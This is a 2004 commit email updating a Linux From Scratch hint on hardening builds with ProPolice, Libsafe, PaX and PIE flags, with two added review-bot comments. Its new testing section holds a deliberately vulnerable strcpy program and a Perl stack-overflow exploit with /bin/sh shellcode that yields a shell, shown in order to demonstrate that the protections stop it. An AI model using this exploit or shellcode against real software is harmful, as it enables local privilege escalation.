cvs commit: hints winter.txt

tushar at linuxfromscratch.org tushar at linuxfromscratch.org
Fri Jan 16 19:27:09 PST 2004


tushar      04/01/16 20:27:09

  Modified:    .        winter.txt
  Log:
  Updated winter.txt
  
  Revision  Changes    Path
  1.3       +204 -26   hints/winter.txt
  
  Index: winter.txt
  ===================================================================
  RCS file: /home/cvsroot/hints/winter.txt,v
  retrieving revision 1.2
  retrieving revision 1.3
  diff -u -u -r1.2 -r1.3
  --- winter.txt	23 Dec 2003 23:46:41 -0000	1.2
  +++ winter.txt	17 Jan 2004 03:27:09 -0000	1.3
  @@ -1,6 +1,6 @@
   AUTHOR: Robert Connolly <cendres at videotron dot ca> (ashes)
   
  -DATE:   2003-12-21
  +DATE:   2003-12-25
   
   LICENSE:        Public Domain
   
  @@ -34,7 +34,7 @@
   		Pie
   	Downloads
   	Installation
  -	Testing ProPolice
  +	Testing
   	Feedback
   	Acknowledgments
   
  @@ -250,6 +250,9 @@
   from /etc/ld.so.preload just for glibc, and add it back after glibc is
   installed. This is not because of a Libsafe violation, but Libsafe will cause
   the glibc build to fail.
  +Bug: Glibc doesn't like the Pax randomization durring make or make check. I
  +think I've read about a Pax/Glibc bug on google. For now use a vanilla kernel on
  +the host.
   
    - GCC pass 2
   Auditors might want to install gcc-3.3.2-bounds-plus-pie-1.patch, or
  @@ -284,33 +287,50 @@
   sed -e 's%$(BIGFILES)%$(BIGFILES) $(OPT)%' Makefile.backup > Makefile &&
   make OPT="$CFLAGS" PREFIX=/tools install
   
  + - Perl
  +env LDFLAGS="-pie" ./configure.gnu --prefix=/tools -Dstatic_ext='IO Fcntl'
  +make perl utilities  OPTIMIZE="-pie -O2" LDFLAGS="-pie"
  +
   Install the rest of chapter 5, and don't forget to install m4, bison, and flex
   in /tools.
   
   ---------
   Chapter 6
   ---------
  -# Glibc
  + - Glibc
   With this all your libraries will be shared objects.
   export CFLAGS="-pie -O2"
   export CXXFLAGS="-pie -O2"
   
  -# Binutils
  + - Binutils
   make CFLAGS="-fno-stack-protector -O2" check
   
  -# GCC
  + - GCC
   patch -Np1 -i ../gcc-3.3.2-protector_only-2.patch
   patch -Np1 -i ../gcc-3.3.2-pie-1.patch
   
  -# Libsafe
  -# There are tests in the Libsafe source you should look at.
  + - Libsafe
  +There are tests in the Libsafe source you should look at.
   make &&
   make install
   
  -# Net-tools
  -make COPTS="-D_GNU_SOURCE -Wall $CFLAGS"
  +- Lfs-utils
  +For some reason mktemp wont build as a shared object.
  +
  + - Vim
  +env LDFLAGS="-pie" ./configure...
  +
  + - Less
  +env LDFLAGS="-pie" ./configure...
   
  -# Bzip2
  + - Net-tools
  +make COPTS="-D_GNU_SOURCE -Wall $CFLAGS" LOPTS="-pie"
  +
  + - Perl
  +env LDFLAGS="-pie" ./configure.gnu --prefix=/usr -Dpager="/bin/less -isR"
  +make OPTIMIZE="-pie -O2" LDFLAGS="-pie"
  +
  + - Bzip2
   cp Makefile Makefile.backup
   sed -e 's%$(BIGFILES)%$(BIGFILES) $(OPT)%' \
   Makefile.backup > Makefile
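Review bot: The new section heading `- Lfs-utils` is written without the leading space that every other heading in this hunk now carries (` - Glibc`, ` - Binutils`, ` - Vim`, ` - Less`), so it will not line up with its siblings when the hint is read or grepped for ` - `. Change it to ` - Lfs-utils` to match the convention this commit introduces for the rest of Chapter 6. The same section also leaves the Vim, Less and later Ed entries with `./configure...` as an elided command; a one-line comment stating that the remaining configure arguments are the ones from the book would make the ellipsis unambiguous.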
  @@ -322,31 +342,42 @@
   make clean
   make OPT="$CFLAGS"
   
  -# Kbd
  -make CFLAGS="$CFLAGS"
  + - Ed
  +env LDFLAGS="-pie" ./configure...
  +
  + - Kbd
  +make CFLAGS="$CFLAGS" LDFLAGS="-pie"
   
  -# Grub
  + - E2fsprogs
  +make LDFLAGS="-pie"
  +
  + - Grub
   env CFLAGS="" ./configure --prefix=/usr
   make CFLAGS=-fno-stack-protector
   
  -# Man
  + - Man
   cp man2html/Makefile.in man2html/Makefile.in.backup
  -sed -e "s/CFLAGS = /CFLAGS = $CFLAGS /" \
  +sed -e "s/CFLAGS = /CFLAGS = -O -pie /" \
   man2html/Makefile.in.backup > man2html/Makefile.in
  +./configure -default -confdir=/etc
  +make CFLAGS="-O -pie" LDFLAGS="-pie"
   
  -# Procinfo
  -make LDLIBS=-lncurses CFLAGS="$CFLAGS"
  + - Procinfo
  +make LDLIBS=-lncurses CFLAGS="$CFLAGS" LDFLAGS="-pie"
   
  -# Procps
  + - Procps
   make CC="gcc -fpie"
   
  -# Sysklogd
  -make RPM_OPT_FLAGS="$CFLAGS"
  + - Sysklogd
  +make RPM_OPT_FLAGS="$CFLAGS" LDFLAGS="-pie"
  +
  + - Sysvinit
  +make -C src CFLAGS="-Wall -D_GNU_SOURCE $CFLAGS" LDFLAGS="-pie"
   
  -# Sysvinit
  -make -C src CFLAGS="-Wall -D_GNU_SOURCE $CFLAGS"
  + - Util-linux
  +make HAVE_KILL=yes HAVE_SLN=yes LDFLAGS="-pie"
   
  -# GCC 2.95.3
  + - GCC 2.95.3
   unset CFLAGS CXXFLAGS
   patch -Np1 -i ../gcc-2.95.3-protector.patch
   
  @@ -369,10 +400,11 @@
   make CC="/opt/gcc-2.95.3/bin/gcc -fstack-protector" modules_install
   
   Try to remember to add -pie to CFLAGS/CXXFLAGS when to install other packages.
  +LDFLAGS too sometimes if needed.
   
  -=================
  -Testing ProPolice
  -=================
  +========
  +Testing
  +========
   
   ## This program overflows the stack.
   
  @@ -427,6 +459,146 @@
   # before foo()
   # Segmentation fault
   
  +First we run thise code with no protection.
  +We are using -static so libsafe isn't used.
  +
  +cat > foo.c << "EOF"
  +/* foo.c */
  +
  + #include <stdio.h>
  + int main(int argc, char **argv)
  + {
  + char buffer[180];
  + if(argc>1)
  + strcpy(buffer,argv[1]);
  + printf("Miam...\n");
  + }
  +EOF
  +
  +gcc -fno-stack-protector -static -o foo foo.c
  +
  +cat > x.pl << "EOF"
  +#!/usr/bin/perl
  +
  + ### le shellcode qui execute /bin/sh
  + $shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" .
  + "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
  + "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
  + "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  +
  + ### Return Address / ESP
  + $ret = 0xbffff8a0;
  +
  + ### la taille du buffer
  + $buf = 208;
  +
  + $egg = 2000;
  +
  + $nop = "\x90";
  +
  + $offset = 0;
  +
  + if (@ARGV == 1) { $offset = $ARGV[0]; }
  + $addr = pack('l', ($ret + $offset));
  +
  + for ($i = 0; $i < $buf; $i += 4) {
  + $buffer .= $addr;
  + }
  +
  + for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++){
  + $buffer .= $nop;
  + }
  +
  + $buffer .= $shellcode;
  + exec("./foo", $buffer,0);
  +EOF
  +
  +Install gdb from http://ftp.gnu.org/gnu/gdb/gdb-6.0.tar.gz
  +Run this, add run `perl -e 'print "A"x208'`
  +Look for "esp 0xbffff8a0", you might have to edit x.pl for you.
  +
  +$ gdb foo
  +GNU gdb 6.0
  +Copyright 2003 Free Software Foundation, Inc.
  +GDB is free software, covered by the GNU General Public License, and you are
  +welcome to change it and/or distribute copies of it under certain conditions.
  +Type "show copying" to see the conditions.
  +There is absolutely no warranty for GDB.  Type "show warranty" for details.
  +This GDB was configured as "i686-pc-linux-gnu"...(no debugging symbols found)...
  +(gdb) run `perl -e 'print "A"x208'`
  +Starting program: /home/ashes/LFS/export/testing/foo `perl -e
  +'print "A"x208'`
  +(no debugging symbols found)...(no debugging symbols found)...Miam...
  +
  +Program received signal SIGSEGV, Segmentation fault.
  +0x41414141 in ?? ()
  +(gdb) info reg
  +eax            0x8      8
  +ecx            0x1fc018d2       532682962
  +edx            0x4014fe00       1075117568
  +ebx            0x4014f9e8       1075116520
  +esp            0xbffff8a0       0xbffff8a0
  +ebp            0x41414141       0x41414141
  +esi            0x40015020       1073827872
  +edi            0xbffff8e4       -1073743644
  +eip            0x41414141       0x41414141
  +eflags         0x10246  66118
  +cs             0x23     35
  +ss             0x2b     43
  +ds             0x2b     43
  +es             0x2b     43
  +fs             0x0      0
  +gs             0x0      0
  +(gdb) kill
  +Kill the program being debugged? (y or n) y
  +(gdb) quit
  +
  +$ ./x.pl
  +Miam...
  +sh-2.05b$
  +
  +This only demonstrates that bad code can freak out and exit to a shell.
  +If this code were part of a daemon running as root, or suid, it would give
  +root shell. The exploits in the libsafe source, and paxtest is basicly the
  +same as this. The paxtest ones are the most modern.
  +
  +Now lets try this code with propolice.
  +
  +rm foo && gcc -fstack-protector -static -o foo foo.c
  +gdb foo
  +...
  +run `perl -e 'print "A"x208'`
  +..
  +Starting program: /home/ashes/LFS/export/testing/foo `perl -e
  +'print "A"x208'`
  +(no debugging symbols found)...(no debugging symbols found)...Miam...
  +foo: stack smashing attack in function main
  +Program received signal SIGABRT, Aborted.
  +0x40047b81 in kill () from /lib/libc.so.6
  +(gdb)
  +
  +Here we can see propolice aborted the program, and now ./x.pl also aborts.
  +Next we test libsafe.
  +
  +rm foo && gcc -fno-stack-protector -o foo foo.c
  +
  +$ ./x.pl
  +Libsafe version 2.0.16
  +Detected an attempt to write across stack boundary.
  +Terminating /home/ashes/LFS/propolice/export/20031223/testing/foo.
  +    uid=1001  euid=1001  pid=742
  +Call stack:
  +    0x40018cbc  /lib/libsafe.so.2.0.16
  +    0x40018deb  /lib/libsafe.so.2.0.16
  +    0x80483a2   /home/ashes/LFS/propolice/export/20031223/testing/foo
  +    0x40039a96  /lib/libc-2.3.2.so
  +Overflow caused by strcpy()
  +Killed
  +
  +And now if you want to build the Pax patch into your kernel, reboot,
  +and start again you will notice the first test doesn't work because
  +the return address keeps changing.
  +
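Review bot: The `foo.c` test program added in this hunk calls `strcpy()` but only includes `<stdio.h>`, so with `gcc -fno-stack-protector -static -o foo foo.c` the compiler will warn about an implicit declaration of `strcpy`, and `main` returns an undefined value because it falls off the end without a `return`. Add `#include <string.h>` next to the existing include and `return 0;` after the `printf` so the sample builds cleanly and the exit status seen in the later gdb and Libsafe runs is deterministic. The surrounding prose has a few typos worth fixing in the same pass: `thise` for `this`, `basicly` for `basically`, and `durring` for `during` in the earlier Glibc hunk. It would also help readers to state explicitly, before the Libsafe run, that the binary is rebuilt without `-static` precisely so that the preloaded `libsafe.so` can interpose on `strcpy`, which is what the "Overflow caused by strcpy()" line demonstrates.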
   ========
   Feedback
   ========
  @@ -498,3 +670,9 @@
   * Do not use "Enforce non-executable pages"
   * Spell check.
   * Fixed URL.
  +[2003-12-22]
  +* Added LOPTS to Net-tools.
  +* Added LDFLAGS to Perl.
  +[2003-12-25]
  +* More cflags.
  +* New tests.
  
  
  